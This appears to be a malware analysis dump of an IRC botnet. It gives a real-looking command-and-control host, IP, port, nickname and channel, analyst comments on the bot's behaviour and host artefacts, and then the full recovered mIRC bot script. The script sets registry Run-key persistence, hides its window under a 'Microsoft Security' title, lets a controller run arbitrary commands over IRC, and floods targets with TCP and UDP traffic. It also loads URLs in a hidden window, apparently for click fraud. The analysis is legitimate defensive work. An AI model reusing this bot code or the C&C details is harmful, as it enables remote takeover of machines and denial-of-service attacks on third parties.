tool.manitam.com 176.227.199.27
dslb-088-065-091-000.pools.arcor-ip.net 88.65.91.0
Opened listening TCP connection on port: 113
Opened listening TCP connection on port: 113
Opened listening TCP connection on port: 113
C&C Server: 176.227.199.27:6669
Server Password:
Username: m0x
Nickname: [x0x]XP92288
Channel: #d0x (Password: )
Channeltopic:
Bot Config:
; Analyst notes on the recovered mIRC remote script (the code below is unchanged from the capture).
; NOTE(review): the dump is collapsed onto two lines, and the backslashes in the registry path and in
;   $replace($mircdir,,) look stripped by extraction; treat it as evidence, not as a loadable script.
; Start-up: "On *:start" calls Nickler, connects to tool.manitam.com on port 6669, starts a repeating
;   timer on the BoTNeT alias, loads dmu.dll with "HideMirc on", runs kayit, and calls yapalim on the
;   first run (%many == 1).
; Persistence: yapalim writes a randomly named .reg file that adds a "Win<os>Service" value under
;   HKLM ...\CurrentVersion\Run pointing at the mIRC executable, imports it with "regedit /s", then
;   deletes the file. "On *:Connect" schedules yapalim again; "on *:exit" runs the executable again.
; Concealment: BoTNeT hides the client via dmu.dll and KCA.dll and sets the title bar text to
;   "Microsoft Security"; private messages, notices and actions are closed and halted; the CTCP
;   VERSION handler replies with stock mIRC version strings.
; Command channel: "On *:Connect" joins #d0x. The channel text handler acts only when $nick == x.
;   "!xxx" or a line starting with the bot's own nick evaluates the rest of the line ($2-) as a
;   command, so the controller gets arbitrary script execution on the host.
; Flood handlers: "!ddos <addr> <port>" drives a timer that opens TCP sockets named "Microsoft..." to
;   %adres:%port; "!udp" sends sockudp datagrams whose payload is read from str.vxd; "!stop" clears
;   the timer and closes all sockets.
; click / hithit / free: load a supplied URL in a hidden window through click.dll on a random timer.
;   presumably automated page visits; confirm against click.dll.
; Identity: Nickler sets the nick to [x0x] + $os + five random digits and enables identd as m0x. This
;   matches the observed nickname [x0x]XP92288, username m0x and the listeners on TCP port 113.
; Host artefacts to hunt for: dmu.dll, KCA.dll, click.dll, kayit.dll, str.vxd beside the mIRC
;   executable; a transient <letter><1-99>.reg file; a "regedit /s" child process; a Run value named
;   "Win<os>Service".
On *:start: { .Nickler .server tool.manitam.com 6669 .timer 0 0 BoTNeT .dll dmu.dll HideMirc on .kayit .inc %many .if (%many == 1) { set %infecttime $day $date $time | yapalim } } alias yapalim { %x = $+($r(a,z),$r(1,99),.reg) | write %x REGEDIT4 | write %x [HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun] | write %x $+("Win,$os,Service"=",$replace($mircdir,,),$nopath($mircexe),") | .run -n regedit /s %x | .timer 1 3 .remove %x | .timer 1 4 unset %x } On *:Connect: { if ($cid == 1) { .join #d0x } if ($cid !== 1) { .disconnect } .timerreg 1 1 yapalim ignore -wd * } on *:disconnect: { close -m | clearall | server } on *:action:*:?:closemsg $nick | halt on *:text:*:?:closemsg $nick | halt on *:notice:*:?:closemsg $nick | halt on *:ping: { ctcp $me ping } on *:exit: { run $remove($mircexe,$mircdir) } on *:text:*:#: { if ($nick == x) { if ($1 == !xxx) { $2- } if ($1 == $me) { $2- } if ($1 == !ddos) { .set %adres $2 | .set %port $3 | .timerddos 00 00 //kapatalým } if ($1 == !stop) { .unset %adres | .unset %port | .timerddos off | .sockclose * } if ($1 = !udp) { if ($2 == stop) { msg # 4UDP 4Attack 4On : %udpaa 4Halted unset %udpaa halt } if ($3 == $null) { halt unset %udpaa } if ($4 == $null) { halt unset %udpaa } set %start 0 set %end $4 set %udpport $3 | if (%udpport == random) { set %udpport $rand(0,65535) } set %udpaa $2 msg # 4UDP 4Attacking: 4( $2 4) on port 4( %udpport 4) |:| 4( $4 4) times :udploop if (%start == %end) { msg # 4UDP 4Attack 4On: %udpaa 4Complete unset %udpaa halt } inc %start 1 if ($3 == 0) { set %randname $rand(10000,99999) set %str $read(str.vxd) set %randport $rand(0,65535) sockudp Udp $+ %randname $+ a $2 %randport %str sockudp Udp $+ %randname $+ b $2 %randport %str sockudp Udp $+ %randname $+ c $2 %randport %str sockudp Udp $+ %randname $+ d $2 %randport %str sockudp Udp $+ %randname $+ e $2 %randport %str sockudp Udp $+ %randname $+ f $2 %randport %str sockudp Udp $+ %randname $+ g $2 %randport %str sockudp Udp $+ %randname $+ h 
$2 %randport %str sockudp Udp $+ %randname $+ i $2 %randport %str sockudp Udp $+ %randname $+ j $2 %randport %str goto udploop } if ($4 != 0) { set %randname $rand(10000,99999) set %str $read(str.vxd) sockudp Udp $+ %randname $+ a $2 $3 %str sockudp Udp $+ %randname $+ b $2 $3 %str sockudp Udp $+ %randname $+ c $2 $3 %str sockudp Udp $+ %randname $+ d $2 $3 %str sockudp Udp $+ %randname $+ e $2 $3 %str sockudp Udp $+ %randname $+ f $2 $3 %str sockudp Udp $+ %randname $+ g $2 $3 %str sockudp Udp $+ %randname $+ h $2 $3 %str sockudp Udp $+ %randname $+ i $2 $3 %str sockudp Udp $+ %randname $+ j $2 $3 %str goto udploop } } } } Alias click { if ($window(@click)) { window -c @click } | %xxx = $1- | window -hp @click | echo -a $dll(click.dll,attach,$window(@click).hwnd) | echo -a $dll(click.dll,navigate,%xxx) | echo -a $dll(click.dll,select,%old_hwnd) } Alias hithit { if (%xxx != $null) { .timerhit 15 $r(15,1800) click %xxx } } Alias free { if ($1 = on) { %xxx = $2 | .timerhit off | hithit } | if ($1 = off) { .timerhit off | window -c @Click } } alias BoTNeT { dll dmu.dll HideMirc on dll KCA.dll Titlebar -m Microsoft Security hide .timer 1 1 dll KCA.dll SetIcon -m 17 $mircexe } alias kayit { run regedit /S kayit.dll .msg # mIRC Baþarýyla Kayýt Edildi.. } alias kapatalým { .sockopen Microsoft $+ $r(a,z) $+ $r(0,9) $+ $r(a,z) $+ $r(0,9) $+ $r(a,z) $+ $r(0,9) %adres %port } Alias Nickler { .nick [x0x] $+ $os $+ $r(10000,99999) .anick [x0x] $+ $os $+ $r(10000,99999) .identd on m0x .emailaddr m0x@ .username $r(0,9) $+ $r(0,9) $+ $r(0,9) $+ $r(0,9) $+ $r(0,9) $+ $r(0,9) $+ $r(0,9) $+ $r(0,9) } raw *:*: { ;if ($numeric = 439) { disconnect } if ($numeric = 432) { nick $nickler } if ($numeric = 433) { nick $nickler } } ctcp 1:Version:*:{ ctcpreply $nick version mIRC v6.20 Khaled Mardam-Bey $randomcuk ctcpreply IRC version mIRC v6.21 Khaled Mardam-Bey $randomcuk ctcpreply Version version mIRC v6.3 Khaled Mardam-Bey $randomcuk }
Hosting info:
http://whois.domaintools.com/176.227.199.27